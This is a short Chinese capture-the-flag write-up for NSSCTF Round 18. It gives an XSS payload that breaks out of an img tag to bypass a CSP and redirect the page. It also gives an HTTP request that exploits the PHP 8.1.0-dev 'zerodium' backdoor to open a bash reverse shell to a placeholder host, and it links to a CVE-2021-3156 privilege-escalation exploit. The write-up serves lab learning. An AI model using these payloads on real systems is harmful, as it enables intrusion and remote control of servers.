NSSCTF Round 18 Basic

N1Rvana included in 比赛记录

2024-02-14 About 200 words One minute - views

Contents

门酱想玩什么呢？

右键源代码发现nssctfroundSpring.php

1
2
3
4
5
6
7
8
9


<?php    
highlight_file(__FILE__);    
//部分关键代码    
$contentLines = explode(" ", $comment['content']);    
if (preg_match('/^https?:\/\/\S+$/', $contentLines[0])) {    
    if (preg_match('/^https?:\/\/[^\/]+\/\S+\.png$/', $contentLines[0], $matches) && end($contentLines) === '/png') {        $urlParts = parse_url($matches[0]);    
        if ($urlParts !== false) {    
            echo '<img class="content" src="' . $matches[0] . '">';            //.......        }        //......    }    //......    
}  

很明显存在xss
通过查看评论区得知需要在门酱处访问元梦之星官网的url，在发表评论处正是上面得到的代码，于是利用 xss 还需要绕过CSP
Content-Security-Policy: script-src 'self' 'unsafe-inline';
利用window.location
构造poc
https://"><script>window.location="https://ymzx.qq.com/"</script>.png /png
得到 http://node2.anna.nssctf.cn:28764/words/?title=MQ==&content=aHR0cHMlM0ElMkYlMkYlMjIlM0UlM0NzY3JpcHQlM0V3aW5kb3cubG9jYXRpb24lM0QlMjJodHRwcyUzQSUyRiUyRnltengucXEuY29tJTJGJTIyJTNDJTJGc2NyaXB0JTNFLnBuZyUyMCUyRnBuZw==
在门酱处插入得到flag

Becomeroot

8.1.0-dev后门漏洞

1
2
3
4
5
6
7
8


GET / HTTP/1.1  
Host: node1.anna.nssctf.cn:28073  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36  
User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'");  
Connection: close  

利用工具进行扫描提权漏洞
https://github.com/The-Z-Labs/linux-exploit-suggester
利用CVE-2021-3156提权
https://github.com/Rvn0xsy/CVE-2021-3156-plus?tab=readme-ov-file